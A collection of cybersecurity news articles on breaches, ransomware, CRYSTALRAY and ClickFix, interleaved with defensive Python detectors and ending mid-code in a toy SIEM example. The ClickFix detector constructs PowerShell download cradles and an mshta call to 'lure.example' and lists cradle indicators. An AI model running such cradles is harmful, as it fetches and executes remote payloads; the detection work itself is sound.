HealthCare.gov, the health insurance exchange website operated by the United States federal government, has reportedly suffered a data breach. A threat actor claims to have orchestrated the HealthCare.gov data breach and to have leaked a database from the website on the dark web containing sensitive information on approximately 7,500 users.

The claim that HealthCare.gov had been compromised surfaced on July 11 on the data leak site BreachForums. The threat actor claimed to be revealing a stolen database of 83,000 lines, consisting of the Personally Identifiable Information (PII) of 7,500 users, including their full names, phone numbers, email addresses, mailing addresses, cities, states and zip codes. To substantiate the claim, the threat actor, operating under the alias "HealthDontCare", attached sample records in a zip archive. In the post, the actor wrote, "Today we are uploading healthcare.gov database breached today. We have exploited several vulnerabilities to gain access to this data. N***ers from United States failed to pay our extortion fee, so f**k off and enjoy."

Potential Impact of HealthCare.gov Data Breach

If proven, the consequences of this attack could be serious, as personal information about citizens would be exposed. Breaches of this nature can lead to identity theft, financial fraud, and a loss of trust among citizens, and the organization should take appropriate measures to protect the privacy and security of the people involved. Currently, details regarding the extent of the HealthCare.gov data breach, the scope of the data compromised, and the motive behind the attack remain undisclosed. Despite the threat actor's claims, the official HealthCare.gov website remains fully functional. That is not by itself inconsistent with a data theft, since exfiltrating records does not require taking a site offline, but the absence of any visible disruption has raised doubts about the authenticity of the assertion. To ascertain the veracity of the claims, The Cyber Express has reached out to officials at the Centers for Medicare & Medicaid Services (CMS). As of the writing of this report, no response has been received, leaving the claim unverified.

HealthCare.gov Suffered Two Cyberattacks Previously

This is not the first time HealthCare.gov has come under scrutiny for data breaches. CMS reported that sensitive data of 93,689 people was compromised during an October 16, 2018 breach of HealthCare.gov that targeted the Direct Enrollment pathway used by insurance agents and brokers. Initially the number of victims was estimated at 75,000. According to CNBC, the 2018 breach exposed personal details including the last four digits of Social Security numbers, immigration status and employer names. The exposed data consisted of information provided on insurance applications, as well as information from other federal agencies used to confirm application details. The breach forced CMS to shut down the Direct Enrollment pathway for a week while it investigated the suspicious activity it had noticed on the portal. Following the breach, CMS reached out to all affected consumers by phone and mailed notification letters offering free credit protection and additional services to prevent and remediate issues arising from unauthorized use of the exposed data, including identity monitoring, identity theft insurance, and identity restoration services. In 2014, too, hackers uploaded malware to a HealthCare.gov test server. CMS stated at the time, "Our review indicates that the server did not contain consumer personal information; data was not transmitted outside the agency, and the website was not specifically targeted. We have taken measures to further strengthen security."

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Vyacheslav Igorevich Penchukov, a Ukrainian hacker known as "Tank", has been sentenced to two concurrent 9-year prison terms by a U.S. federal court in Lincoln, Nebraska, for his role in a prolific cybercrime gang that stole tens of millions of dollars from small businesses. The 38-year-old pleaded guilty to two charges: conspiracy to participate in racketeering and conspiracy to commit wire fraud. Judge John M. Gerrard also ordered him to pay more than $73 million in restitution and forfeited funds for these crimes.

'Tank' and the JabberZeus Crew

Penchukov admitted to leading the Jabber Zeus hacking group, which used sophisticated malware to steal bank account information from small U.S. and European businesses. The group's operations, which began in 2009, resulted in tens of millions of dollars in losses. The FBI had been pursuing Penchukov for over a decade, and his capture in Switzerland in 2022 brought an end to his criminal career. While leading the Jabber Zeus crew, 'Tank' used the Zeus malware to infect computers and steal bank account information. He also organized the IcedID malware operation, which collected financial details and allowed ransomware to be deployed on infected systems. Investigators found a spreadsheet detailing the $19.9 million income IcedID made in 2021.

The University of Vermont Medical Center was among the prominent victims of the IcedID malware, losing over $30 million in the attack, with many of the institution's critical patient services unavailable for more than two weeks. Penchukov had been charged in connection with the attack by federal prosecutors in the Eastern District of North Carolina. In response to the incident, U.S. Attorney Michael Easley for the Eastern District of North Carolina stated, "Malware like IcedID bleeds billions from the American economy and puts our critical infrastructure and national security at risk." Last September, Dr. Stephen Leffler, President of the University of Vermont Medical Center, testified before the House of Representatives that the center was unable to access its own medical records for 28 days because of the incident. Dr. Leffler stated, "We didn't have internet." He added, "We didn't have phones. It impacted radiology imaging, laboratory results." According to Dr. Leffler's testimony, the medical center's staff rushed to purchase walkie-talkies to keep services running.

Penchukov appeared on the FBI's most wanted cyber list for over a decade as the recognized leader of the cybercrime gang. Earlier, prosecutors had stated in court, "The defendant played a crucial role, a leadership role, in this scheme by directing and coordinating the exchange of stolen banking credentials and money mules." Jim Craig, a former FBI special agent who led the 2009 investigation into the Zeus cybercriminal group, expressed satisfaction with the outcome. Craig stated, "I never thought that we would ever see any of Jabber Zeus crew face justice in the U.S." Besides his involvement in cybercrime, Penchukov had also been a popular DJ in Ukraine under the moniker 'DJ Slava Rich.'

Implications of the Ruling

The prosecution of Penchukov represents a significant milestone in the fight against high-value cybercrime targets and shows law enforcement's persistence in the face of international jurisdictional challenges. Western law enforcement authorities are known to face difficulties in prosecuting Eastern European cybercriminals, particularly those operating out of Russia or Ukraine, which do not have official extradition agreements with the U.S. government. Craig pointed out, "The significance of him being caught is important to show that law enforcement is not going to stop—wherever they go, there's going to be a chance and opportunity for them to get caught." The case also raises questions about possible cooperation between Penchukov and the authorities in ongoing cybercrime investigations: according to court documents, both Penchukov's own lawyer and the U.S. government requested less severe sentences after he pleaded guilty to the two conspiracy charges. Several other charges against Penchukov were dropped after he signed a plea agreement whose details have not been made public.
Several counties in the United States are facing the wrath of ransomware, with one confirming that hundreds of thousands of people were impacted in a late 2023 attack and another declaring an attack from earlier this week a "local disaster." Last year, 95 ransomware attacks on local governments were reported, according to Emsisoft. There have already been more than 50 reported attacks on cities and counties this year, the most prominent being Washington, Miami, Fulton, Kershaw, Hidalgo, Gallup-McKinley, and Los Angeles.

Dallas County October Ransomware Attack Exposed Data of 200,000 People

In October 2023, the Play ransomware gang claimed to have stolen data during an attack on Dallas County systems. The county publicly acknowledged the incident and assured the public that it had successfully contained the damage. "Due to our containment measures, Dallas County interrupted data exfiltration from its environment and effectively prevented any encryption of its files or systems," the county said at the time. However, it also said that it was still assessing the nature of the exposed information when Play published it. Because the review process was extensive, Dallas County provided details of the actual impact only on Wednesday, in a filing with the Maine Attorney General, and sent data breach notices to 201,404 impacted individuals. The data confirmed to have been exposed may include full names, Social Security numbers (SSNs), dates of birth, driver's license numbers, state identification numbers, taxpayer identification numbers, medical information, and health insurance information. There are several reasons why Dallas County might hold such sensitive information. It said, "You could be a resident, an employee, or you might have received services from or interacted with one of our agencies (e.g., Department of Health and Human Services). Additionally, the County participates in data sharing agreements with other organizations to enhance the services we offer to our residents and the public."

Ransomware Attack Forced Indiana County to File a Local Disaster Declaration

Clay County, Indiana, a rural community of roughly 25,000 residents, declared a local disaster on Thursday after a ransomware attack crippled critical government services. The attack, discovered early Tuesday morning, rendered county data inaccessible and severed electronic connections with state partners, hindering essential operations at the Clay County Courthouse, Community Corrections, and Clay County Probation. "We cannot access our data or electronically connect with some of the state partners we work with for many of our tasks," Clay County commissioners said in a local press conference. County officials immediately contacted local and federal law enforcement to investigate the incident. The Clay County Courthouse and Health Department remained shuttered throughout Tuesday and Wednesday. While the 911 system remained operational, non-emergency lines experienced temporary disruptions that have since been rectified. As of Thursday afternoon, the Clay County website was also unavailable.

This incident comes on the heels of a similar attack on neighboring Monroe County, Indiana. Earlier this week, Monroe County commissioners confirmed that the BlackSuit ransomware gang had targeted their systems, potentially compromising the personal information of the county's 140,000 residents. BlackSuit claimed to have stolen employee data and county business information during the attack.

[Image: Source: Monroe County Board of Commissioners]

BlackSuit is a rebranded version of the Royal ransomware group, which was also responsible for a crippling attack on the Dallas city government last year. The group recently targeted Cedar Falls, Iowa; city officials there were able to thwart the attack before significant damage occurred, reported the incident to the FBI, and assured residents that city services remained unaffected. This recent string of attacks underscores the growing threat posed by ransomware gangs, particularly to smaller municipalities with potentially less robust cybersecurity defenses. The Clay County and Monroe County incidents highlight the critical need for local governments to prioritize cybersecurity preparedness and invest in robust incident response plans to minimize disruption and safeguard sensitive data.
A threat actor group dubbed 'CRYSTALRAY' has dramatically scaled up its attack operations, targeting over 1,500 victims worldwide with an arsenal of open-source security tools. Researchers first observed the group's activities in February 2024 and have been tracking its evolving tactics since. The group's primary goals appear to be credential theft, cryptomining and maintaining persistent long-term access to compromised systems. Its tradecraft reflects a concerning trend: the weaponization of legitimate open-source security tools by threat actor groups for malicious intent and illicit financial gain.

CRYSTALRAY Reconnaissance and Initial Access

Researchers from Sysdig observed that the group had significantly scaled up its operations, targeting over 1,500 victims through the abuse of a wide range of legitimate open-source security tools to exploit known vulnerabilities and deploy backdoors. CRYSTALRAY's attack chain begins with careful reconnaissance of potential victims; the group uses tools from ProjectDiscovery, an open-source organization, to identify targets. CRYSTALRAY's arsenal includes zmap, asn, httpx, nuclei, platypus, and SSH-Snake. To gain initial access, the group often modifies existing proof-of-concept exploits for known vulnerabilities, testing them before deployment against real-world targets. These operations tend to focus on specific countries, with the United States and China accounting for over half of the observed victims.

[Image: Chart of targeted countries (Source: sysdig.com)]

The attackers use the "asn" tool to generate lists of IP address ranges for the targeted countries. They then use zmap, a network scanner, to probe these IPs for exposed services that are ripe for exploitation in commonly used platforms such as Confluence, WebLogic and ActiveMQ. httpx is used to verify that the discovered services are actually running and reachable, with an httpx_output.txt file generated to filter out invalid results. Nuclei then performs vulnerability scans against the surviving hosts, identifying CVEs such as CVE-2022-44877 (command injection in CentOS Web Panel), CVE-2021-3129 (remote code execution in Laravel's Ignition debug page) and CVE-2019-18394 (server-side request forgery in Openfire).

Lateral Movement, Data Theft and Crypto-Mining

After breaching a system, CRYSTALRAY focuses on lateral movement and data collection. A key tool in its arsenal is SSH-Snake, an open-source worm that spreads through networks using SSH keys and credentials found on each compromised host.

[Image: Source: sysdig.com]

The group moves beyond server access to search for credentials such as passwords or API keys of popular cloud providers stored as environment variables or in files such as .env configurations, potentially allowing it to expand its reach into victims' cloud infrastructure. The group automates SSH-Snake to extract credential data and exfiltrate it to attacker-owned command-and-control servers. Ultimately, the group deploys cryptominers on breached systems, hijacking the host's processing power, with a script that kills any existing cryptominers to maximize profit. The researchers traced the deployed mining workers to a specific pool and found they were earning roughly $200 per month; starting in April, the group switched to a new configuration, making it impossible for the researchers to determine its current revenue.

The researchers offer the following recommendations to protect against these attacks:

- Reduce the cloud attack surface through sound vulnerability, identity, and secrets management, so that automated attacks of this kind find nothing to exploit.
- Organizations that must expose applications to the public Internet face additional risk and should prioritize vulnerability remediation on those assets.
- Runtime detection that lets organizations spot successful attacks, take immediate remedial action, and perform in-depth forensic analysis to determine the root cause.

The scale and sophistication of CRYSTALRAY's operations highlight the growing threat posed by cybercriminals leveraging open-source security tools.
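The worm-like SSH spreading described above has a visible footprint on the defender's side: one source address authenticating with a key to many hosts in a short span. The following is an added example (not Sysdig's code, and not SSH-Snake's own logic) of how to flag that fan-out from sshd logs that have been forwarded to a central collector. It assumes each line carries the reporting host name as a syslog collector would prefix it; the log lines are constructed, and the threshold and window values are illustrative.

```python
"""Flag SSH lateral-movement fan-out from centralised sshd logs.

Added example, not Sysdig's code.  Assumptions: 'Accepted publickey' lines
from many hosts are forwarded to one place and each line is prefixed with
the reporting host name, as a syslog collector would do.  Sample lines are
constructed, not real."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: one source (10.0.0.5) hops across four hosts within a
# minute, which is what an SSH-spreading worm looks like from the log side.
SAMPLE_LOG = """\
2024-06-01T10:00:01 web1 sshd[101]: Accepted publickey for deploy from 10.0.0.5 port 51000 ssh2: RSA SHA256:aaaa
2024-06-01T10:00:07 db1 sshd[202]: Accepted publickey for deploy from 10.0.0.5 port 51002 ssh2: RSA SHA256:aaaa
2024-06-01T10:00:15 app2 sshd[303]: Accepted publickey for root from 10.0.0.5 port 51004 ssh2: RSA SHA256:aaaa
2024-06-01T10:00:40 app3 sshd[404]: Accepted publickey for ops from 10.0.0.5 port 51006 ssh2: RSA SHA256:aaaa
2024-06-01T10:05:00 web1 sshd[105]: Accepted publickey for alice from 192.168.1.20 port 52000 ssh2: ED25519 SHA256:bbbb
2024-06-01T11:00:00 db1 sshd[210]: Accepted publickey for alice from 192.168.1.20 port 52010 ssh2: ED25519 SHA256:bbbb
2024-06-01T10:00:50 app3 sshd[405]: Failed password for root from 10.0.0.5 port 51008 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: Accepted (?P<method>\w+) for "
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_accepted(log_text):
    """Return sorted (timestamp, reporting_host, user, source_ip, method) tuples
    for successful logins; failed attempts and other lines are ignored."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["host"],
                           m["user"], m["src"], m["method"]))
    events.sort()
    return events


def find_fanout(events, min_hosts=3, window_seconds=300):
    """Return {source_ip: sorted hosts} for every source that reaches at least
    min_hosts distinct hosts inside some window_seconds span.  A sliding window
    over each source's timeline keeps this linear per source."""
    by_src = defaultdict(list)
    for ts, host, _user, src, _method in events:
        by_src[src].append((ts, host))
    alerts = {}
    for src, timeline in by_src.items():
        best = set()
        start = 0
        for end in range(len(timeline)):
            # shrink the window from the left until it fits in window_seconds
            while (timeline[end][0] - timeline[start][0]).total_seconds() > window_seconds:
                start += 1
            hosts = {h for _, h in timeline[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            alerts[src] = sorted(best)
    return alerts


if __name__ == "__main__":
    for src, hosts in find_fanout(parse_accepted(SAMPLE_LOG)).items():
        print(f"possible SSH fan-out from {src}: {', '.join(hosts)}")
```

Legitimate automation (configuration management, backup jobs) will also trip this rule, so in practice the source addresses of known orchestration hosts are allow-listed and the alert is enriched with the key fingerprint, which the sample lines already carry and which ties the hops together even when the user names differ.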
Researchers have uncovered a malware delivery method dubbed "ClickFix," which exploits user trust through compromised websites to deliver the DarkGate and Lumma Stealer malware families. The ClickFix technique uses social engineering to trick users into executing malicious scripts themselves, potentially leading to severe compromise of the affected systems. The compromised sites redirect visitors to domains hosting fake popup windows, which instruct users to paste a script into a PowerShell terminal.

ClickFix Social Engineering Infection Chain

After visitors are redirected from seemingly legitimate sites, instructions are displayed that deceive them into pasting base64-encoded commands into a PowerShell terminal. Researchers from McAfee Labs stated that these commands are designed to download and execute malware from remote attacker-controlled C2 servers.

[Image: Prevalence over past three months (Source: mcafee.com)]

The ClickFix technique is an effective method of malware deployment precisely because the victim, not an exploit, runs the first stage. Once active on the system, the malware typically takes steps to evade detection, such as clearing clipboard contents and running processes in minimized windows, establishes persistence on the victim's system, and steals the user's personal data to send to a command-and-control (C2) server. The researchers detailed the use of the ClickFix technique by the DarkGate and Lumma Stealer malware:

DarkGate

DarkGate is a malware family that uses the ClickFix technique. It is distributed through phishing emails that contain HTML attachments masquerading as Microsoft Word documents. When a user opens the attachment, the HTML file displays a "How to fix" button which, when clicked, presents base64-encoded commands that conceal malicious PowerShell instructions.

[Image: Source: mcafee.com]

When run, the PowerShell commands download and execute an HTA file that carries further malicious payloads. Once the system is infected, the malware is capable of exfiltrating sensitive information and giving the threat actors unauthorized remote access.

Lumma Stealer

[Image: Source: mcafee.com]

Lumma Stealer is distributed through a similar use of the ClickFix technique, but visitors are usually greeted directly with a webpage displaying an error message, such as a supposed browser problem, together with instructions to 'fix' the issue. These instructions likewise trick users into entering base64-encoded commands into a PowerShell terminal, which run the Lumma Stealer malware. Because the victim launches the payload from an interactive shell, the stealer can bypass controls that only watch for exploitation or for malicious attachments.

Mitigations and Remediations

To protect against the ClickFix technique and malware such as DarkGate and Lumma Stealer, the researchers shared the following recommendations:

- Regular training to inform potential victims about social engineering tactics and phishing campaigns.
- Use of antivirus software on endpoints.
- A robust email and web filtering system to block phishing mail, malicious attachments and malicious websites.
- Deployment of firewalls and intrusion detection/prevention systems (IDS/IPS) to block malicious network traffic.
- Network segmentation to limit the spread of malware within the organization.
- Monitoring of network logs and traffic.
- Enforcement of the principle of least privilege (PoLP).
- Security policies for, or monitoring of, clipboard content, particularly in sensitive environments.
- Multi-factor authentication (MFA).
- Keeping operating systems, software, and applications updated to the latest patched versions.
- Encryption of stored data and data in transit against unauthorized access.
- Regular, secure backups of important data.
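Both lures above end with the victim pasting a base64 blob into PowerShell, and that is the step process-creation telemetry sees. The block below is an added example (not McAfee's code) of the detection logic a SOC could run over command lines taken from Windows Event ID 4688 or Sysmon Event ID 1: it decodes the two encodings the lures rely on, namely the UTF-16LE base64 that PowerShell's -EncodedCommand expects and a plain base64 string handed to FromBase64String, and then matches the decoded text against download-cradle indicators. The sample command lines, the lure host name, and the indicator list are all constructed for the example.

```python
"""Spot ClickFix-style PowerShell launches in process-creation telemetry.

Added example, not McAfee's code.  Assumes command lines have already been
extracted from an EDR or Windows process-creation event; the sample lines
and the host lure.example are constructed.  PowerShell's -EncodedCommand
takes UTF-16LE text encoded in base64, so the decoder mirrors that, and a
plain base64 argument to FromBase64String is decoded as UTF-8."""
import base64
import re

CRADLE_PATTERNS = [
    r"\bIEX\b|Invoke-Expression",          # run a string as code
    r"DownloadString|DownloadFile",         # .NET WebClient fetch
    r"Invoke-WebRequest|\biwr\b|\bcurl\b",  # cmdlet / alias fetch
    r"\bmshta\b|\.hta\b",                   # HTA stage seen with DarkGate
    r"-w(indowstyle)?\s+hidden",            # minimised/hidden window
]
CRADLE_RE = re.compile("|".join(CRADLE_PATTERNS), re.IGNORECASE)
ENC_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
B64_ARG_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)


def _b64(data, utf16=False):
    """Decode base64, tolerating stripped padding; UTF-16LE for -EncodedCommand."""
    raw = base64.b64decode(data + "=" * (-len(data) % 4))
    return raw.decode("utf-16-le" if utf16 else "utf-8", errors="replace")


def expand_command(cmdline):
    """Return the command line with every encoded payload decoded and appended,
    so the matcher sees the real instructions rather than opaque base64."""
    parts = [cmdline]
    for blob in ENC_FLAG_RE.findall(cmdline):
        parts.append(_b64(blob, utf16=True))
    for blob in B64_ARG_RE.findall(cmdline):
        parts.append(_b64(blob))
    return "\n".join(parts)


def classify(cmdline):
    """Return the sorted list of cradle indicators found; an empty list means
    nothing in the (decoded) command line looked like a download cradle."""
    expanded = expand_command(cmdline)
    return sorted({m.group(0).lower() for m in CRADLE_RE.finditer(expanded)})


def encode_for_powershell(script):
    """Build the constructed samples the way a ClickFix page would: the text a
    victim pastes after -EncodedCommand is UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed samples: one admin script, one ClickFix-style cradle hidden in
# -EncodedCommand, one cradle hidden inside FromBase64String.
SAMPLES = {
    "benign": 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    "clickfix_enc": "powershell.exe -w hidden -ec "
        + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://lure.example/fix.ps1')"),
    "clickfix_b64arg": 'powershell.exe -Command "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\''
        + base64.b64encode(b"mshta http://lure.example/stage.hta").decode() + "')))\"",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name:16} -> {classify(cmd) or 'no indicators'}")
```

Decoding before matching is the whole point: a rule that only inspects the raw command line sees a harmless-looking base64 string, which is exactly why the lures encode the payload. A production rule would also key on the parent process, since a PowerShell launched from explorer.exe with a hidden window and an encoded command is far rarer than the same launch from a scheduled task or a management agent.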
AT&T disclosed a massive data breach today that impacts the call and text records of "nearly all" of its customers. The hackers gained unauthorized access to a third-party cloud platform containing this data, which an AT&T spokesperson confirmed to The Cyber Express to be Snowflake. The incident, discovered in April, impacts a vast swathe of AT&T's mobile and landline customers, raising concerns about potential identity theft and targeted attacks. A spokesperson for AT&T told The Cyber Express: "This was aggregated metadata, not the content of calls or texts, nor was it social security numbers or credit card information. This incident took place outside of our network. Our systems were not breached."

According to AT&T, the compromised data spans May 1 to October 31, 2022, for most customers, with a limited number affected by records from January 2, 2023. While the data does not include call or text content, Social Security numbers, or other personally identifiable information (PII), it does contain phone numbers and, for some records, cell site details. "Based on our investigation, the compromised data includes files containing AT&T records of calls and texts of nearly all of AT&T's cellular customers, customers of mobile virtual network operators (MVNOs) using AT&T's wireless network, as well as AT&T's landline customers who interacted with those cellular numbers." Phone numbers, coupled with publicly available online tools, can be used to identify individuals, AT&T warned. Though the telecom giant says the data is not currently publicly available, the potential for future exposure remains a significant risk.

AT&T Data Breach Tied to Larger Snowflake Campaign

Details regarding the attackers and their motivations are not yet clear; however, an AT&T spokesperson told TCE that the access point for the breach was the cloud platform Snowflake. Snowflake is currently at the center of what is probably the largest and most high-profile cluster of breaches this year, including Ticketmaster, Santander, Advance Auto Parts, Pure Storage, and Neiman Marcus, among others. In June, cybersecurity company Mandiant said it had identified around 165 Snowflake customers whose credentials had been exposed by infostealer malware, some dating back to 2020. Infostealers harvest credentials from infected machines, including usernames and passwords but also authentication tokens and cookies. Many of these credentials are then offered for sale on dark web forums for anywhere from tens to thousands of dollars. Snowflake did not immediately respond to a request for comment, but in May the company's CISO, Brad Jones, had said, "We have not identified evidence suggesting this activity was caused by a vulnerability, misconfiguration, or breach of Snowflake's platform," attributing the breaches instead to poor credential hygiene in customer accounts. Since then, Snowflake has taken several measures to strengthen its security posture, including the establishment of a Trust Center and letting Snowflake admins make multi-factor authentication (MFA) mandatory.

One Arrested in Relation to the AT&T Data Breach

The telecom giant has enlisted cybersecurity experts to investigate the intrusion and is working with law enforcement, the company confirmed in an 8-K filing with the U.S. Securities and Exchange Commission. "AT&T is working with law enforcement in its efforts to arrest those involved in the incident. Based on information available to AT&T, it understands that at least one person has been apprehended." AT&T plans to notify impacted customers and offer resources to safeguard their information. The incident underscores the need for robust cloud security measures and highlights the expanding threat landscape for the telecommunications industry. The absence of call content or PII is a saving grace, but the potential for identity theft and targeted attacks using phone numbers persists. Security professionals will want to know how the attackers authenticated to the Snowflake environment, and in particular whether the account relied on a password alone without MFA, since Snowflake has attributed the wider campaign to stolen credentials rather than to a platform vulnerability.
The American Radio Relay League (ARRL), the national association for amateur radio in the United States, which reported that it was the target of a significant ransomware attack in May 2024, has now confirmed that data of a few of its employees was stolen in the cyberattack. The ARRL data breach notification was recently shared with impacted individuals; it states that a "sophisticated ransomware incident" was detected after the attackers breached and encrypted its computer systems on May 14.

ARRL Data Breach: What Was Affected?

ARRL is the preeminent national association for amateur radio enthusiasts in the United States. In its data breach notification on May 20, ARRL said that the attackers compromised data from the "Logbook of The World" (LoTW) internet database. This platform is crucial for amateur radio operators, allowing them to record and verify successful contacts (QSOs) with fellow operators globally. LoTW's function as a digital logbook and a contact confirmation system is central to many enthusiasts who rely on its integrity for maintaining accurate records. Following the attack, ARRL said, "We immediately took the affected systems offline, secured our network environment and engaged independent third-party forensic specialists to assist us with investigating the extent of any unauthorized activity. "Our investigation has determined that the unauthorized third party may have acquired your personal information during this incident. Please know that we have taken all reasonable steps to prevent your data from being further published or distributed, have notified and are working with federal law enforcement to investigate."

ARRL Data Breach Only Affected 150 Employees: Maine AG Filing

ARRL, in its filing with the Office of the Maine Attorney General this week, said that the May breach affected 150 employees. In its recent notice to impacted individuals, ARRL wrote, "While we have no evidence that your information has been misused, we are notifying you of this incident and are offering you the resources provided in this letter, in an abundance of caution and so that you can take precautionary steps to help protect yourself, should you wish to do so. ARRL recommends you proceed with caution and take advantage of the resources provided in this letter." The association is providing those impacted by the breach with 24 months of free identity monitoring. "We value the safety of your personal information and want to make sure you have the information you need so that you can take steps to further protect yourself, should you feel it appropriate to do so. We encourage you to remain vigilant and to regularly review and monitor relevant account statements and credit reports and report suspected incidents of identity theft to local law enforcement, your state's Attorney General or the Federal Trade Commission (the "FTC"). "To help relieve concerns and restore confidence following this incident, we have secured the services of Kroll to provide identity monitoring at no cost to you for 24 months. Kroll is a global leader in risk mitigation and response, and their team has extensive experience helping people who have sustained unintentional exposure of confidential data. Your identity monitoring services include Credit Monitoring, $1 Million Identity Fraud Loss Reimbursement, Fraud Consultation, and Identity Theft Restoration," the association said in a statement.

Although ARRL has so far released two public statements regarding the incident, it has not linked the ransomware attack to a specific threat actor. The incident is also a reminder of the risks that come with digital transformation. As organizations increasingly rely on online platforms for critical services, enhanced cybersecurity measures become indispensable. ARRL's experience could prompt other associations and similar entities to re-evaluate their cybersecurity postures and adopt more stringent safeguards.
A medium-sized company is an attractive target for cybercriminals. It operates on a scale that's large enough for the company to pay a substantial ransom if its data is taken hostage. Meanwhile, its approach to information security is often an inheritance from the time when it was much smaller. Attackers can come up with a tactic to bypass the company's basic protection and compromise the network with little to no resistance. The damage done by such incidents averages around $100,000. The regulatory side of things also cannot be ignored: cybersecurity rules and regulations have been proliferating around the world, and so have the fines for non-compliance. Businesses are often cognizant of these threats and willing to allocate more resources to their infosec teams. How do you take your corporate security to the next level without excessive outlay? Here's a little spoiler: deploying a SIEM (Security Information and Event Management) system is key.

Layered protection

A company's long-term goal should be to build layered defenses in which different tools and controls complement one another to significantly complicate attacks on the company and limit the attacker's options. A company with 500 to 3000 employees is almost certain to have the basic tools and the initial protective layer: access control through authentication and authorization, endpoint protection (popularly known as antivirus), server protection including email servers, and a firewall.

The next thing to do is supplement, rather than replace, this arsenal with more advanced cybersecurity tools, such as:

- A system for comprehensive monitoring and correlation of security events from a variety of data sources (computers, servers, and applications) in real time across the entire infrastructure
- Tools for obtaining enhanced information about possible incidents or just suspicious activity and anomalies
- Incident response tools: from investigations in accordance with regulatory requirements, to isolation of compromised hosts and accounts, vulnerability elimination, and so on
- Advanced identity management tools: from centralized user management and role-based access control, to a single authentication portal with MFA
- Tools for improving visibility and manageability of IT assets, attack surface management, and patch management

Having all of these at the same time is out of the question, so implementing these measures will need to be prioritized and broken down into phases. That said, comprehensive monitoring forms the basis for many other information security tools, and therefore SIEM implementation should be close to the top of the list. This equips defenders with brand-new capabilities: detecting attackers' malware-free activities, spotting both suspicious objects and suspicious behavior, and visualizing and prioritizing infrastructure events. Proper use of SIEM can relieve the workload on the infosec team, as it spares them the need to spend time handling isolated events, logs, and other artifacts manually.

What a SIEM system is and why a medium-sized company needs one

SIEM solutions have been used for comprehensive IT monitoring in corporate infrastructures for two decades now. These solutions are composed of a number of components that collect, store, organize, and analyze telemetry, and allow responding to incoming events.
Thanks to SIEM, an infosec employee can receive most alerts in a single console, easily link different aspects of an event (such as file creation, network activity, and account login) into a single entity without having to dig through five different data sources, and respond promptly to these events. The high degree of automation saves the infosec team a great deal of time. What you used to do manually just by walking over to a coworkers computer becomes too much effort as the company grows in size. Key SIEM components for medium-sized businesses The architecture may differ between SIEM systems, but the key elements are always the same: Event sources: these arent part of the SIEM, but they serve as providers of information. Anything that generates logs as it runs – whether its an operating system, EDR agent, business application, or network device – can be a source. Collector: this is typically a separate service that receives logs from telemetry sources for processing in the SIEM. Log normalizer and storage: these are elements of the SIEM platform core. The normalizer transforms and adapts the logs it receives from a collector to make them suitable for use, search, and analysis. Centralized data storage significantly simplifies detection and investigation of incidents, as well as the provision of incident information to regulators. Event correlation is the heart of SIEM systems. This is the key step where disjointed events contained in different logs are correlated, merged if found to be associated with the same activity or different stages of a single activity, and prioritized. Prioritization is driven by threat intelligence available to the defenders. This is what can serve as the basis for writing a rule that wont ping the infosec team every time a PowerShell script runs, but will raise an alert if a script runs with command-line options characteristic of a targeted attack. 
Dashboards and alerts are a purely visual but important part of the system that helps make sense of heaps of data, easily find what youre looking for, quickly drill down into an incident, and learn about issues or suspicious events in time. A steep price used to be a real barrier to SIEM adoption by medium-sized businesses, as the products were aimed at larger companies exclusively. This has now changed with the advent of new solutions that no longer target just the enterprise segment of the market, such as our Kaspersky Unified Monitoring and Analysis platform.
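To make the normalizer, correlation and prioritization steps described above concrete, here is a small added example in Python. It is not Kaspersky code and not a real SIEM: the three log formats (an EDR agent emitting JSON lines, a firewall syslog line, and a domain-controller logon line), the log records themselves and the list of PowerShell options treated as suspicious are all constructed for the demo. It normalizes the three sources into one schema, then implements the rule from the text: plain PowerShell runs stay quiet, while a run with flagged options becomes the anchor of an incident that pulls in the file, network and logon events from the same host in a five-minute window, with a score that grows with the amount of linked activity.

```python
"""Toy SIEM pipeline: normalize -> correlate -> prioritize.
Added example; not Kaspersky code and not a production SIEM.
All sample logs and the suspicious-option list are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
import json
import re

# --- Event sources (constructed sample telemetry, assumed formats) -------
EDR_LOG = """\
{"ts": "2024-07-12T09:00:01", "host": "ws-17", "type": "process", "user": "alice", "cmd": "powershell.exe -File backup.ps1"}
{"ts": "2024-07-12T09:05:10", "host": "ws-23", "type": "process", "user": "bob", "cmd": "powershell.exe -nop -w hidden -enc PLACEHOLDER"}
{"ts": "2024-07-12T09:05:12", "host": "ws-23", "type": "file", "user": "bob", "path": "C:/Users/Public/u.dll"}
"""
FW_LOG = """\
2024-07-12T09:05:15 fw01 ALLOW host=ws-23 dst=203.0.113.7:443
2024-07-12T09:00:03 fw01 ALLOW host=ws-17 dst=192.0.2.10:445
"""
DC_LOG = """\
2024-07-12T09:04:58 dc01 LOGON user=bob host=ws-23 result=success
"""

# Stand-in for threat intelligence: PowerShell options we treat as suspicious.
# Constructed for the demo, not a vetted indicator list.
SUSPICIOUS_PS_FLAGS = {"-enc", "-w hidden", "-nop"}

FW_RE = re.compile(r"(?P<ts>\S+) (?P<dev>\S+) (?P<action>\S+) host=(?P<host>\S+) dst=(?P<dst>\S+)")
DC_RE = re.compile(r"(?P<ts>\S+) (?P<dev>\S+) LOGON user=(?P<user>\S+) host=(?P<host>\S+) result=(?P<result>\S+)")


def normalize(edr=EDR_LOG, fw=FW_LOG, dc=DC_LOG):
    """Normalizer: turn every raw record into one common schema
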